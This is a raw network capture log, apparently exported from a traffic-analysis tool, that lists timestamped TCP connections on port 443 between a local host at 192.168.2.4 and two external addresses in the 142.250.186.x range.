                                                                                                              Dec 30, 2024 11:36:41.745635033 CET49972443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:41.745651960 CET44349972142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:41.747684956 CET49972443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:41.747714996 CET44349972142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.022516966 CET44349971142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.022573948 CET49971443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:42.022687912 CET49971443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:42.022710085 CET44349971142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.022749901 CET49971443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:42.023411036 CET49974443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:42.023458958 CET44349974142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.023528099 CET49974443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:42.023812056 CET49974443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:42.023823977 CET44349974142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.027626991 CET44349970142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.027806044 CET49970443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:42.027828932 CET44349970142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.027874947 CET49970443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:42.027951002 CET49970443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:42.027986050 CET44349970142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.028067112 CET49970443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:42.028595924 CET49975443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:42.028640032 CET44349975142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.028713942 CET49975443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:42.028956890 CET49975443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:42.028964043 CET44349975142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.166893005 CET44349972142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.166963100 CET49972443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:42.166975021 CET44349972142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.166989088 CET44349972142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.167017937 CET49972443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:42.167045116 CET49972443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:42.167057991 CET44349972142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.167113066 CET44349972142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.167160034 CET49972443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:42.167717934 CET49972443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:42.167736053 CET44349972142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.168920994 CET49981443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:42.168965101 CET44349981142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.169123888 CET49981443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:42.169342995 CET49981443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:42.169357061 CET44349981142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.297466040 CET44349973142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.297777891 CET49973443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:42.298074007 CET49973443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:42.298088074 CET44349973142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.298343897 CET49973443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:42.298352003 CET44349973142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.628968000 CET44349975142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.629084110 CET49975443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:42.630131006 CET44349975142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.630189896 CET49975443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:42.632164001 CET49975443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:42.632183075 CET44349975142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.632693052 CET44349975142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.632821083 CET49975443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:42.632833004 CET44349974142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.632890940 CET49974443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:42.633173943 CET49975443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:42.633644104 CET44349974142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.633702993 CET49974443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:42.635242939 CET49974443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:42.635251045 CET44349974142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.635566950 CET44349974142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.635620117 CET49974443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:42.635920048 CET49974443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:42.679336071 CET44349975142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.683334112 CET44349974142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.711708069 CET44349973142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.711816072 CET49973443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:42.711833000 CET44349973142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.711899042 CET49973443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:42.711905003 CET44349973142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.712049007 CET49973443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:42.712054968 CET44349973142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.712104082 CET49973443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:42.712107897 CET44349973142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.714721918 CET49973443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:42.723948002 CET49973443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:42.723968029 CET44349973142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.724890947 CET49982443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:42.724931955 CET44349982142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.726378918 CET49982443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:42.726655006 CET49982443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:42.726666927 CET44349982142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.768412113 CET44349981142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.768667936 CET49981443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:42.768956900 CET49981443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:42.768963099 CET44349981142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:42.769392014 CET49981443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:42.769398928 CET44349981142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.000974894 CET44349974142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.001024008 CET49974443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:43.001045942 CET44349974142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.001108885 CET49974443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:43.001209021 CET49974443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:43.001236916 CET44349974142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.001281977 CET49974443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:43.001879930 CET49988443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:43.001928091 CET44349988142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.001986027 CET49988443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:43.002319098 CET49988443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:43.002331018 CET44349988142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.006388903 CET44349975142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.006449938 CET49975443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:43.006483078 CET44349975142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.006529093 CET49975443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:43.006623030 CET49975443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:43.006653070 CET44349975142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.006764889 CET49975443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:43.007246971 CET49989443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:43.007287025 CET44349989142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.007339954 CET49989443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:43.007589102 CET49989443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:43.007599115 CET44349989142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.186640024 CET44349981142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.186686993 CET44349981142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.186774015 CET49981443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:43.186774015 CET49981443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:43.186784983 CET44349981142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.186904907 CET49981443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:43.186913013 CET44349981142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.187036991 CET49981443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:43.187798023 CET49981443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:43.187817097 CET44349981142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.188246012 CET49991443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:43.188288927 CET44349991142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.188345909 CET49991443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:43.188608885 CET49991443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:43.188630104 CET44349991142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.349833012 CET44349982142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.349941015 CET49982443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:43.350347042 CET49982443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:43.350363970 CET44349982142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.352184057 CET49982443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:43.352189064 CET44349982142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.613929033 CET44349988142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.614005089 CET49988443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:43.614747047 CET44349988142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.614815950 CET49988443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:43.617841959 CET49988443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:43.617849112 CET44349988142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.618123055 CET44349988142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.618179083 CET49988443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:43.618621111 CET49988443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:43.647269964 CET44349989142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.647375107 CET49989443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:43.648010015 CET44349989142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.648063898 CET49989443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:43.649916887 CET49989443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:43.649936914 CET44349989142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.650157928 CET44349989142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.650218010 CET49989443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:43.650670052 CET49989443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:43.659331083 CET44349988142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.695336103 CET44349989142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.752897024 CET44349982142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.752973080 CET49982443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:43.752983093 CET44349982142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.753022909 CET49982443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:43.753034115 CET44349982142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.753082991 CET49982443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:43.753175020 CET44349982142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.753364086 CET44349982142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.753376007 CET49982443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:43.753586054 CET49982443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:43.767348051 CET49982443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:43.767358065 CET44349982142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.768520117 CET49997443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:43.768552065 CET44349997142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.768604994 CET49997443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:43.769340038 CET49997443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:43.769355059 CET44349997142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.807988882 CET44349991142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.808053970 CET49991443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:43.828310013 CET49991443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:43.828325987 CET44349991142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.828849077 CET49991443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:43.828859091 CET44349991142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.986378908 CET44349988142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.986574888 CET49988443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:43.986604929 CET44349988142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.987029076 CET44349988142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:43.990906954 CET49988443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:44.024210930 CET44349989142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:44.026313066 CET44349989142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:44.026619911 CET49989443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:44.056624889 CET49988443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:44.056652069 CET44349988142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:44.062963963 CET49998443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:44.062985897 CET44349998142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:44.067483902 CET49998443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:44.083067894 CET49998443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:44.083087921 CET44349998142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:44.198404074 CET49989443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:44.198432922 CET44349989142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:44.202397108 CET49997443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:44.202446938 CET49999443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:44.202483892 CET44349999142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:44.207189083 CET49999443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:44.208050013 CET44349991142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:44.208107948 CET44349991142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:44.208223104 CET44349991142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:44.208292961 CET49991443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:44.240258932 CET50000443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:44.240300894 CET44350000142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:44.240619898 CET50000443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:44.240641117 CET49998443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:44.240858078 CET49999443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:44.240878105 CET44349999142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:44.241019011 CET50000443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:44.241029978 CET44350000142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:44.250714064 CET50001443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:44.250761032 CET44350001142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:44.252065897 CET50001443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:44.259766102 CET50001443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:44.259783030 CET44350001142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:44.324912071 CET49991443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:44.324953079 CET44349991142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:44.325341940 CET50004443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:44.325382948 CET44350004142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:44.326224089 CET50004443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:44.326543093 CET50004443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:44.326555014 CET44350004142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:44.841973066 CET44350000142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:44.842088938 CET50000443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:44.844098091 CET50000443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:44.844110012 CET44350000142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:44.844357014 CET44350000142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:44.844417095 CET50000443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:44.844783068 CET50000443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:44.859992981 CET44349999142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:44.860088110 CET49999443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:44.860459089 CET49999443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:44.860479116 CET44349999142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:44.860649109 CET49999443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:44.860656977 CET44349999142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:44.865035057 CET44350001142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:44.865168095 CET50001443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:44.867913008 CET44350001142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:44.867970943 CET50001443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:44.869944096 CET50001443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:44.869957924 CET44350001142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:44.870217085 CET44350001142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:44.870263100 CET50001443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:44.870646000 CET50001443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:44.887335062 CET44350000142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:44.911335945 CET44350001142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:44.958489895 CET44350004142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:44.958621025 CET50004443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:44.960552931 CET50004443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:44.960563898 CET44350004142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:44.960807085 CET44350004142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:44.960855007 CET50004443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:44.961441994 CET50004443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:45.007324934 CET44350004142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.232012033 CET44350001142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.232109070 CET50001443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:45.232134104 CET44350001142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.232146025 CET44350001142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.232167959 CET50001443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:45.232187986 CET50001443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:45.232361078 CET50001443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:45.232372999 CET44350001142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.232969046 CET50014443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:45.232989073 CET44350014142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.233093977 CET50014443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:45.233278990 CET50014443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:45.233289003 CET44350014142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.235146046 CET44349999142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.235224009 CET49999443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:45.235234976 CET44349999142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.235340118 CET49999443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:45.235439062 CET49999443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:45.235467911 CET44349999142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.235611916 CET44349999142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.235759020 CET49999443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:45.235759020 CET49999443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:45.235836029 CET50015443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:45.235877991 CET44350015142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.236099005 CET50015443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:45.236409903 CET50015443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:45.236423016 CET44350015142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.263387918 CET44350000142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.263448000 CET44350000142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.263461113 CET50000443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:45.263495922 CET44350000142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.263514042 CET50000443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:45.263536930 CET50000443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:45.263545036 CET44350000142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.263580084 CET44350000142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.263582945 CET50000443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:45.263618946 CET50000443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:45.264256001 CET50000443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:45.264272928 CET44350000142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.264806032 CET50016443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:45.264836073 CET44350016142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.264906883 CET50016443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:45.265101910 CET50016443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:45.265111923 CET44350016142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.418525934 CET44350004142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.418586969 CET44350004142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.418603897 CET50004443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:45.418623924 CET44350004142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.418648005 CET50004443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:45.418663979 CET50004443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:45.418673038 CET44350004142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.418709040 CET50004443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:45.418709040 CET44350004142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.418776989 CET50004443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:45.419310093 CET50004443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:45.419333935 CET44350004142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.419888020 CET50017443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:45.419936895 CET44350017142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.420042992 CET50017443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:45.420339108 CET50017443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:45.420350075 CET44350017142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.835527897 CET44350015142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.835618973 CET50015443192.168.2.4142.250.186.142
